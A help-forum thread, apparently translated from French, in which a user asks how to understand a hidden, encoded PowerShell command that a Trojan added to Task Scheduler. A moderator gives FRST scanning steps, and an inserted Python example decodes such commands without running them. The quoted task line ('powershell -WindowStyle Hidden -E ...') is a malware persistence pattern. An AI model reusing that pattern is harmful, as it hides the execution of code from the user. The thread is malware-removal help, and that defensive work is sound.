Trojan horse
KingkoPop
bazfile - Posts: 58595 - Status: Moderator, Security contributor
Hello, I had a Trojan horse that infected my machine, and I saw that they added tasks to my Task Scheduler, notably this one, which I have trouble understanding:
At the command prompt it runs this command:
/c powershell -WindowStyle Hidden -E "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"
Having seen this monstrosity, I am wondering how to find the thing that is Hidden, so that I can understand what it is doing with this file.
My question is: how can this thing be found?
Thanks in advance!
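An added example, not part of the original thread: the `-E` switch in the task above is PowerShell's `-EncodedCommand`, whose argument is the script text encoded as UTF-16LE and then Base64, so it can be read without running it. The function name, the regular expression and the sample command line below are constructed for illustration.

```python
import base64
import binascii
import re

# A switch token (-Name or /Name) followed by a bare or quoted Base64-looking value.
_SWITCH = re.compile(r"""(?<!\S)[-/](\w+)\s+["']?([A-Za-z0-9+/=]+)["']?""")


def decode_encoded_command(command_line):
    """Return the script text behind -E/-EncodedCommand, or None if absent.

    The payload is only decoded to text; nothing is executed.
    """
    for match in _SWITCH.finditer(command_line):
        name = match.group(1).lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...).
        if name != "ec" and not "encodedcommand".startswith(name):
            continue
        try:
            raw = base64.b64decode(match.group(2), validate=True)
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError) as exc:
            raise ValueError(f"not a valid encoded command: {exc}") from exc
    return None


# Constructed sample: a harmless script encoded the way PowerShell expects,
# placed in a command line shaped like the scheduled-task action in the post.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_TASK_ACTION = f'/c powershell -WindowStyle Hidden -E "{SAMPLE_B64}"'

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_TASK_ACTION))
```

Run it on a copy of the task's command line taken from the Task Scheduler export, preferably on a machine other than the infected one.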
2 replies
Hello,
Download FRST; once it is downloaded, save it to the desktop, then right-click FRST and choose Run as administrator. You will see this:
Click Scan
Caution: wait until the messages saying that the scan is finished are displayed

At the end of the scan you will have two text files on the desktop, FRST and Addition

Then upload the FRST and ADDITION reports to CJOINT (see THIS TUTORIAL), then give the two links generated by Cjoint in your reply.
Hello,
Thanks for your reply, here are the 2 txt files:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Thanks in advance <3